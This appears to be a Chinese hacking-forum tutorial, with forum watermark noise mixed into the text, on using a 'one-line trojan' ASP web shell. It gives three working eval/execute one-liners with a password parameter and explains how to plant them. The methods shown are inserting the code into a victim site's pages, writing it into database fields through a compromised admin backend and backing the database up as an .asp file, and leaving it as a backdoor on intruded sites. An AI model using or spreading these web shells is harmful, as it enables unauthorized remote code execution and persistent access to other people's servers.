返回列表 发帖

[原创教程] 一句话木马的使用方法视频

一句话木马的使用  
' D. y# w) ?7 ~; n: k/ H
5 `$ G( n8 k$ x3 q8 eby:柔肠寸断 790653916  www.3ast.com.cn  不免费收点徒弟~~~0 {% W4 J" X9 h% _
4 [: {: a6 ]( ?$ I" w

) Z  O4 t" i3 D) f; W9 l' W) a1、咱们先弄懂怎么使用的。6 x# y9 M% s  M( `  K

8 g! d. C+ l- d- N) l4 }6 d% p分为客户端和服务端
- P8 B) S+ k+ R+ J6 c% y) X1 j
: N  d$ j, s+ f- \1 P# s
) ?4 M( V- W0 X6 @客户端是连接上去的程序,也可以是网页
4 B' f. d1 G, U; S, q6 z6 t0 C" z5 Z( s' L! S
http://www.3ast.com.cn/tool/yijuhua.html
+ N; q2 I+ T; i8 n5 T
4 T5 x6 ]0 y! p服务端就是一段代码,代码里有对应的“密码”
- K& x, t- Z# x2 {& Y0 l! ~- E7 J  i4 k! P
提供三个服务端:
8 B3 O5 J" f, g# w2 t1. <%eval request("cnnsc")%>
- D( L7 v5 [1 F( m2. <%execute request("cnnsc")%> 2 A  m) X* y5 a/ G* L$ E
3. <%execute(request("cnnsc"))%>
, a! R. S) L/ ~5 t0 p6 s# J2 P3 O5 K; D- o  E. K% E
cnnsc--密码  y$ K" n6 I: R4 |- c% s

/ _: z' C( i" @' t1 q5 Z- h& l6 X我们只要把这个代码插入到对方网站的网页中就可以了- K' C0 F6 q' l9 g! }3 k

  X. F- m' F% L/ o2 r我演示下,用已经有的一个webshell添加一个asp文件,加上 <%eval request("cnnsc")%> 2 {4 L+ M5 W' I5 ?! v
. s% `! o: y2 l2 x& {1 `/ U4 Q# Z
换一个页面,添加过了。访问的时候一切正常,看链接1 S9 |7 D3 K2 W3 y4 U# N' X- K
# Y7 I1 H  y5 `- |( T- }
上传之后. n0 I& e% M- \6 J3 ^  c) N- V: d
8 m& E. Z3 l0 \, W0 H
链接上去了. a* D2 U1 |( ~4 ?- L: _
OK.这个就是链接的主要过程
  _" n, u7 X" W' T3 W& |5 u' l
, B! I, v, a1 ]2 }( Z  p1 G* A8 [, [6 P4 G
) W7 z1 D& D* V$ V0 m
2 m& b* z+ y6 q5 A4 x) B
2、然后懂得哪里会用上、怎么用. _7 h) l: V* l& K8 h

' y9 _+ t  r+ h/ U2 U(1)有的时候我们进入了XXX的后台,后台有备份数据库,那么我们就可以在系统中插入这个一句话代码,任意地方,比如皮肤名称啊,文章标题啊,只要是会被写进数据库的就可以了,然后备份数据库成一个asp文件(也有php的一句话),然后链接就可以拿下来了
/ F7 n: v# m! {" G3 h1 Q6 O$ C' T& e% ~
(2)可以给自己入侵的网站留下后门。。。。& T+ s( D$ q; J4 K* C6 w

2 T, Z$ b& `- C$ o% w, f3 M' P4 a(3)我再想想。。。哎,想不出,还是要自己多多实践。。。。, f+ _2 ~7 _0 b( l$ R$ g

5 k9 n+ i2 p2 g5 B2 D好了,教程到此结束,不懂的可以再来问我。。。790653916
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • huar

返回列表